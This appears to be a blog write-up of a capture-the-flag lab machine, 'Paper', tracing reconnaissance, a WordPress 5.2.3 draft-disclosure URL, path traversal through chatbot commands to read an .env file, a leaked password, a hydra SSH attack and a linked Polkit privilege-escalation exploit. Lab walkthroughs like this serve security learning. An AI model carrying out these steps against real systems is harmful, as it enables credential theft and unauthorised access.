[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…

2025-02-18 9 0

Information Gathering

IP Address Opening Ports
10.10.11.143 TCP:22,80,443

$ ip='10.10.11.143'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 1005ea5056a600cb1c9c93df5f83e064 (RSA)
|   256 588c821cc6632a83875c2f2b4f4dc379 (ECDSA)
|_  256 3178afd13bc42e9d604eeb5d03eca022 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
|_http-generator: WordPress 5.2.3
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28

WordPress 5.2.3 unauthorized access

http://10.10.11.143/

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图

$ whatweb http://10.10.11.143/ -v

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图1

# echo '10.10.11.143 office.paper'>>/etc/hosts

http://office.paper/

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图2

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图3

$ feroxbuster -u 'http://office.paper/'

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图4

$ wpscan --url 'http://office.paper/'

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图5

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

http://office.paper/?static=1

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图6

# echo '10.10.11.143 chat.office.paper'>>/etc/hosts

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图7

hubot-rocketchat LFI

https://github.com/RocketChat/hubot-rocketchat

list .

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图8

list ../

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图9

file ../hubot/.env

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图10

username:recyclops
password:Queenofblad3s!23

$ hydra -L user -p 'Queenofblad3s!23' ssh://10.10.11.143

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图11

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图12

User.txt

5f02c513c06b2e212e3433c1a09e5103

Privilege Escalation:Polkit

https://github.com/Almorabea/Polkit-exploit

[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图13

Root.txt

97ae0f9636f32f353b018406349c97ad


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

Web应用&企业产权&域名资产&网络空间&威胁情报
【CTF】Python Jail沙箱逃逸手法总结 PyJail All in One
风投巨头Insight Partners遭遇网络攻击,敏感数据或泄露
网络犯罪转向社交媒体,攻击量达历史新高
雅虎数据泄露事件:黑客涉嫌兜售60.2万个电子邮件账户
黑客如何利用提示词工程操纵AI代理?

发布评论